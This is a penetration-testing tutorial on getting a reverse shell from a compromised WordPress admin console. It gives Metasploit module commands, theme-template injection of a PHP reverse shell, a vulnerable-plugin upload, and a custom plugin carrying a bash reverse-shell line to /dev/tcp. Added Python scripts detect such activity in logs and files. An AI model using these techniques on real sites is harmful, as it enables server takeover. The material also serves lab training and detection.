
Wordpress: Reverse Shell: Penetration Testing September 28, 2019 Raj Chandel

1. The document discusses multiple methods to exploit a WordPress site to obtain remote access, including using Metasploit to upload a malicious plugin, injecting PHP code into WordPress themes, uploading a vulnerable plugin, and injecting a custom malicious plugin.
2. It provides steps to use the Metasploit wp_admin_shell_upload exploit module and a PHP reverse shell to inject code and get a reverse shell on the target server.
3. Additional techniques demonstrated include modifying the 404.php template to inject PHP code and uploading a vulnerable reflex-gallery plugin that can be exploited via Metasploit.

Uploaded by

eve johnson

WordPress: Reverse Shell

posted in Penetration Testing on September 28, 2019 by Raj Chandel



This post covers WordPress security testing: which procedures can be used to exploit
WordPress once the admin console has been compromised. We have already set up WordPress on
our local machine; if you want to learn WordPress installation and configuration, visit
the link given below.

https://www.hackingarticles.in/wordpress-penetration-testing-lab-setup-in-ubuntu/

As we all know, wpscan is a standalone tool for identifying vulnerable WordPress plugins and
themes, but this post is not a wpscan tutorial.

Table of Contents

- Metasploit Framework
- Injecting Malicious code in WP_Theme
- Upload Vulnerable WP_Plugin
- Inject Malicious Plugin

Requirement:

Host machine: WordPress

Attacker machine: Kali Linux

WordPress Credential: admin: admin (in our case)

Let’s begin!!

As you can observe, I have access to the WordPress admin console over the web browser; to
obtain a web shell we need to exploit this CMS. There are multiple methods to exploit
WordPress, so let’s go through some of them.

Metasploit Framework

The very first method uses the Metasploit Framework. This module takes an
administrator username and password, logs into the admin panel, and uploads a payload
packaged as a WordPress plugin. Because this is authenticated code execution by design, it
should work on all versions of WordPress, and as a result it gives a meterpreter session on
the web server.

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit

Great!! It works wonderfully, and you can see that we have obtained a reverse connection
from the web server via a meterpreter session.

Injecting Malicious code in WP_Theme

There’s also a second technique that lets you spawn web server shells. If you have a username
and password for the administrator, log in to the admin panel and inject malicious PHP code
into a WordPress theme.

Log in to the WP dashboard and explore the Appearance tab.

Now go to the Twenty Fifteen theme and choose the 404.php template.

You will see a text area for editing the template; inject your malicious PHP code here to
obtain a reverse connection from the web server.

To proceed further, we used the PHP reverse shell (by Pentestmonkey). We copied the
php-reverse-shell and pasted it into the 404.php WordPress template as shown in the picture
below. We altered the IP address to our present IP address, entered a port of our choice,
and started the netcat listener to get the reverse connection.

Update the file and browse the following URL to run the injected PHP code.

http://192.168.1.101/wordpress/wp-content/themes/twentyfifteen/404.php

You will have your session upon execution of the 404.php file. Access netcat using the following
command:

Upload Vulnerable WP_Plugin

Sometimes logged-in users do not have write permission to modify the
WordPress theme, so we choose “Inject WP plugin malicious” as an alternative strategy for
acquiring a web shell.

So, once you have access to a WordPress dashboard, you can attempt installing a malicious
plugin. Here I’ve already downloaded the vulnerable plugin from Exploit-DB.

Click here to download the plugin for practice.


Since we have the zip file for the plugin, it’s time to upload it.

Dashboard > plugins > upload plugin


Browse the downloaded zip file as shown.

Once the package gets installed successfully, we need to activate the plugin.

When everything is set up, go for the exploit. We have installed the vulnerable
plugin named “reflex-gallery”, and it is easily exploitable.

The exploit for this vulnerability is available inside the Metasploit Framework; load the
module below and execute the following commands:

use exploit/unix/webapp/wp_slideshowgallery_upload
set rhosts 192.168.1.101
set targeturi /wordpress
exploit

Once the above commands are executed, you will have your meterpreter session. As
portrayed in this article, there are multiple methods to exploit a WordPress-based
website.
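
The console actions used by the methods above (plugin upload, plugin activation, theme editing, then requesting the template by URL) each leave a line in the web server access log. The following detection sketch is an added example, not part of the original post; it assumes combined log format, and the sample log lines, client address and plugin name are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: ip - user [time] "METHOD uri proto" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# WordPress loads theme templates through index.php; a theme .php file
# requested by URL is what running an edited 404.php looks like in the log.
THEME_PHP = re.compile(r"/wp-content/themes/[^/]+/.+\.php$")

def classify(method, uri):
    """Return a label for an admin action worth reviewing, else None."""
    parts = urlsplit(uri)
    path = parts.path
    action = parse_qs(parts.query).get("action", [""])[0]
    if method == "POST" and path.endswith("/wp-admin/update.php") and action == "upload-plugin":
        return "plugin-zip-upload"
    if path.endswith("/wp-admin/plugins.php") and action == "activate":
        return "plugin-activated"
    # Older releases save editor changes here; newer ones go through
    # admin-ajax.php with the action in the POST body, which is not logged.
    if method == "POST" and path.endswith("/wp-admin/theme-editor.php"):
        return "theme-file-edited"
    if THEME_PHP.search(path):
        return "theme-php-requested-directly"
    return None

def scan(lines):
    """Return (ip, label, uri) for each flagged request that was served (2xx/3xx)."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, _when, method, uri, status = m.groups()
        label = classify(method, uri)
        if label and status[0] in "23":
            hits.append((ip, label, uri))
    return hits

# Constructed sample lines (addresses, times and plugin name are made up).
_T = '192.168.1.50 - - [28/Sep/2019:10:0%d:00 +0000] "%s HTTP/1.1" %d 512 "-" "-"'
SAMPLE = [
    _T % (1, "GET /wordpress/", 200),
    _T % (2, "POST /wordpress/wp-admin/update.php?action=upload-plugin", 200),
    _T % (3, "GET /wordpress/wp-admin/plugins.php?action=activate&plugin=demo%2Fdemo.php", 302),
    _T % (4, "POST /wordpress/wp-admin/theme-editor.php", 302),
    _T % (5, "GET /wordpress/wp-content/themes/twentyfifteen/404.php", 200),
    _T % (6, "GET /wordpress/wp-content/themes/twentyfifteen/style.css", 200),
]
```

On the hardening side, setting `DISALLOW_FILE_EDIT` to true in wp-config.php removes the theme and plugin editor, and `DISALLOW_FILE_MODS` also blocks plugin and theme installation from the dashboard.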

Inject Malicious Plugin

As you have seen above, we uploaded a vulnerable plugin whose exploit is
available. This time we are going to inject our own generated malicious plugin to obtain a
reverse shell.

This is quite simple: we saved the malicious code for the reverse shell inside a PHP file named
“revshell.php” and compressed the file in zip format.

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'")


Again, repeat the same steps as above to upload the plugin file “revshell.zip”, and start
a netcat listener to obtain the reverse connection from the target machine.

Once the package gets installed successfully, we need to activate the plugin.

As soon as you activate the plugin, it will throw the reverse connection to the netcat
session.
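
Both payload styles on this page leave recognisable strings on disk: a shell redirect to /dev/tcp, or PHP that pairs command execution with an outbound socket. This file scanner is an added example, not code from the original post; the rule names and the temporary sample tree (including the `thumbs` plugin) are constructed for illustration.

```python
import os
import re
import tempfile

# Indicators for the two payload styles on this page: a command redirected to
# /dev/tcp, and PHP that opens a socket and spawns a process.
RULES = {
    "shell-to-/dev/tcp": re.compile(rb"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "php-command-exec": re.compile(rb"\b(?:exec|system|passthru|shell_exec|proc_open|popen)\s*\("),
    "php-outbound-socket": re.compile(rb"\b(?:fsockopen|pfsockopen|stream_socket_client)\s*\("),
}

def scan_file(path):
    """Return the sorted names of every rule that matches the file's bytes."""
    with open(path, "rb") as fh:
        data = fh.read()
    return sorted(name for name, rx in RULES.items() if rx.search(data))

def scan_tree(root):
    """Map relative path -> matched rule names for PHP files worth reviewing."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".phtml")):
                continue
            full = os.path.join(dirpath, fname)
            hits = scan_file(full)
            # A lone exec() is common in legitimate plugins; report a file only if
            # it has a /dev/tcp redirect or combines two different indicators.
            if "shell-to-/dev/tcp" in hits or len(hits) >= 2:
                findings[os.path.relpath(full, root)] = hits
    return findings

def demo():
    """Build a constructed wp-content tree in a temp dir and scan it."""
    samples = {
        "themes/twentyfifteen/index.php": b"<?php get_header(); ?>",
        "plugins/thumbs/thumbs.php": b'<?php exec("convert a.png b.jpg"); ?>',
        "plugins/revshell/revshell.php":
            b"exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'\")",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
        return scan_tree(root)
```

Run `scan_tree()` against a copy of `wp-content` and compare flagged files with the checksums of the plugin and theme releases you actually installed.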

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer; she is
an enthusiastic pentester and Security Analyst at Ignite Technologies.
